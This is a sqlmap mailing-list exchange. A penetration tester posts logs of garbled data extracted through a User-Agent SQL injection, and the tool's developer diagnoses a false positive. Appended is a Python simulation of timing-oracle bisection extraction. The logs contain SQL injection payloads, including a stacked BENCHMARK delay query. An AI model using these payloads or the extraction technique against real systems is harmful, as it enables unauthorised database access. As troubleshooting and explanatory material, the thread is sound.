Hi Chris.

I am pretty sure that this was a false positive :)

First thing is that you've stumbled upon a rare beast of MySQL stacked :).
That was a first hint that something could be wrong.

Another thing is that in every case where you have a time- or stacked-based
injection we have a false positive test, but there is a slight chance that
a false positive falls through it (really small). Now, if you see that
random garbage in those cases you have to KNOW that you've stumbled upon a
false positive.

Please, to make sure, just use --flush-session --time-sec=10 (or some other
value greater than default 5). You'll probably see that there won't be any
positives in that case.

Kind regards,
Miroslav Stampar

On Sat, Jun 2, 2012 at 9:11 PM, Chris Rowe <pipedreamreal...@gmail.com> wrote:

> I am doing a test right now and I am receiving unusual output during data
> retrieval.  I have never seen this from sqlmap before.  I have tried using
> single or multi threads, --no-cast, and --hex options with no luck.  I am
> using sqlmap 1.0-dev r5100.  Could the data in the database be a different
> language that sqlmap can't read?  The client's site is primarily in
> Arabic.  I need help!!  Thanks
>
> *Here is the output from the log file:*
>
> Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND 6574=6574--
>
>     Type: stacked queries
>     Title: MySQL < 5.0.12 stacked queries (heavy query)
>     Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
> BENCHMARK(10000000,MD5(0x504b774c));--
> ---
>
> current user:    None
>
> current database:    None
>
> current user is DBA:    None
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: User-Agent
> Parameter: User-Agent
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause (Generic
> comment)
>     Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
> 6574=6574--
>
>     Type: stacked queries
>     Title: MySQL < 5.0.12 stacked queries (heavy query)
>     Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
> BENCHMARK(10000000,MD5(0x504b774c));--
> ---
>
> current user:    'x?'
>
> current database:    None
>
> current user is DBA:    None
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: User-Agent
> Parameter: User-Agent
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause (Generic
> comment)
>     Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
> 6574=6574--
>
>     Type: stacked queries
>     Title: MySQL < 5.0.12 stacked queries (heavy query)
>     Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
> BENCHMARK(10000000,MD5(0x504b774c));--
> ---
>
> current user:    'x?'
>
> current database:    '??n x^}h'
>
> current user is DBA:    None
>
>
> *Here is the command line output during testing:*
>
> [13:37:28] [INFO] changes made by tampering scripts are not included in
> shown payload content(s)
> [13:37:28] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows Vista
> web application technology: Apache, ASP.NET 4.0.30319, ASP.NET, Microsoft
> IIS 7.0
>
> back-end DBMS: MySQL 5
> [13:37:28] [INFO] fetching current user
> [13:37:28] [INFO] retrieving the length of query output
> [13:37:28] [INFO] retrieved:
> [13:37:32] [INFO] resumed: x?
> current user:    'x?'
>
> [13:37:32] [INFO] fetching current database
> [13:37:32] [INFO] retrieving the length of query output
> [13:37:32] [INFO] retrieved: 8
> [13:38:32] [INFO] retrieved: ??n  x^}h
> current database:    '??n x^}h'
>
> [13:38:32] [INFO] testing if current user is DBA
> [13:38:32] [INFO] fetching current user
> [13:38:32] [INFO] retrieving the length of query output
> [13:38:32] [INFO] retrieved: 6
> [13:38:58] [WARNING] there was a problem decoding value '??????' from
> expected hexadecimal form
>
> current user is DBA:    None
>
> [13:38:58] [INFO] fetching database users
> [13:38:58] [INFO] fetching number of database users
> [13:38:58] [INFO] retrieved: 48
> [13:39:08] [CRITICAL] unable to retrieve the number of database users
> [13:39:08] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 23 times
>
> [*] shutting down at 13:39:08
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
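
The effect described in the reply above, as an added simulation that is not part of the original thread and is not sqlmap's code: when a server's latency occasionally spikes past the delay threshold, a delay-based oracle answers at random and the "retrieved" characters are garbage, while a larger delay such as `--time-sec=10` puts the threshold above the noise. The latency model, the plain `response time >= time_sec` check and the sample value `root@lab` are all constructed assumptions.

```python
import random

def response_time(rng, injectable, condition_true, time_sec):
    """Constructed latency model: ~0.3 s baseline, 35% of responses are slow."""
    t = rng.gauss(0.3, 0.05)
    if rng.random() < 0.35:              # overloaded server / HTTP 500 path
        t += rng.uniform(4.0, 8.0)       # spike of 4 to 8 seconds
    if injectable and condition_true:    # only a real injection adds the delay
        t += time_sec
    return max(t, 0.0)

def looks_delayed(rng, injectable, condition_true, time_sec):
    """Simplified oracle (assumption): delayed means response >= time_sec."""
    return response_time(rng, injectable, condition_true, time_sec) >= time_sec

def infer_char(rng, injectable, secret_ch, time_sec):
    """Bisection over 0..127 driven only by 'was the response delayed?'."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if looks_delayed(rng, injectable, ord(secret_ch) > mid, time_sec):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def extract(injectable, time_sec, secret="root@lab", seed=1):
    """Recover `secret` one character at a time through the timing oracle."""
    rng = random.Random(seed)
    return "".join(infer_char(rng, injectable, c, time_sec) for c in secret)

def noise_hits(time_sec, trials=2000, seed=2):
    """How often a NON-injectable endpoint looks delayed purely from noise."""
    rng = random.Random(seed)
    return sum(looks_delayed(rng, False, True, time_sec) for _ in range(trials))

if __name__ == "__main__":
    for t in (5, 10):
        print(f"time_sec={t}: noise hits {noise_hits(t)}/2000, "
              f"not injectable -> {extract(False, t)!r}, "
              f"injectable -> {extract(True, t)!r}")
```
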